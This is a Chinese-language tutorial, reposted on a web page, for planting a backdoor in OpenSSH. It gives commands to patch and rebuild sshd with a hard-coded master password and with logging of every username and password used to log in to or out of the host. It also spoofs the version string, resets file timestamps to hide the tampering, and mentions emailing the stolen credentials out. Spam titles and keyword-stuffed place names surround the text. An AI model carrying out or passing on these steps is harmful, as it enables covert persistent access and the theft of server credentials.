91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

OpenSSH后門獲取root密碼

發布時間:2020-08-15 22:19:07 來源:網絡 閱讀:3264 作者:huangzp168 欄目:安全技術

1. 查看sshd系統版本

    [root@huangzp2 src]# ssh -V

    OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013


2. 解壓版本,其中patch為補丁包

    tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

    tar -zxvf openssh-5.9p1.tar.gz


3. 替換補丁文件,替換前備份文件

    mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

    cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/

    cd openssh-5.9p1

    patch < sshbd5.9p1.diff # 打補丁就是替換或修改原來的文件

 OpenSSH后門獲取root密碼

   patching file auth.c # 認證

   patching file auth-pam.c #認證

   patching file auth-passwd.c #認證

   patching file canohost.c

   patching file includes.h

   patching file log.c

   patching file servconf.c # 關于sshd服務端

   patching file sshconnect2.c # 關于sshd連接

   patching file sshlogin.c # 關于登錄,把root密碼記錄下來

   patching file version.h # 關于版本


4. 修改后門密碼和記錄root密碼的文件夾目錄

   vim includes.h

 OpenSSH后門獲取root密碼


  #define ILOG "/usr/share/ifile"  # 記錄錄到本機的用戶名和密碼

  #define OLOG "/usr/share/ofile"  # 記錄從本機登錄到其他機器的用戶名和密碼

  #define SECRETPW "12345678"  # 后門密碼


5. 編輯vim version.h,修改版本號與原來一致

    原來:OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

 OpenSSH后門獲取root密碼


6. 編譯安裝

   組件:yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc

            ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

            make -j 4 ;make install

            --prefix=/usr   # 安裝目錄

           --sysconfdir=/etc/ssh   # 指定sshd配置文件

           --with-pam   # pam認證

           --with-kerberos5   # kerberos認證


7. 還原新配置文件為舊配置文件時間

   說明:將ssh_config和sshd_config修改時間跟ssh_config.old和sshd_config.old一致

  touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config   touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config


8. 重啟sshd服務

    service sshd restart


9. 驗證并查看

    登錄后再次查看就記錄了密碼,修改了密碼再次登錄也會記錄

1)記錄錄到本機的用戶名和密碼

 OpenSSH后門獲取root密碼


2)記錄從本機登錄到其他機器的用戶名和密碼

 OpenSSH后門獲取root密碼


3)后門密碼登錄

 OpenSSH后門獲取root密碼


10. 配置自動發送郵件

    ........略


    參看文獻 http://www.cnblogs.com/croso/p/5280783.html


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

乐亭县| 神池县| 小金县| 武安市| 西安市| 遵义市| 仪征市| 文化| 饶平县| 固镇县| 永吉县| 远安县| 莎车县| 阿拉善盟| 和政县| 铅山县| 内丘县| 抚宁县| 招远市| 丽江市| 保靖县| 开江县| 福泉市| 巴马| 资阳市| 清远市| 萍乡市| 黄浦区| 都昌县| 石河子市| 武川县| 云林县| 怀化市| 公主岭市| 汝南县| 天峨县| 福清市| 玉树县| 东山县| 绥宁县| 白山市|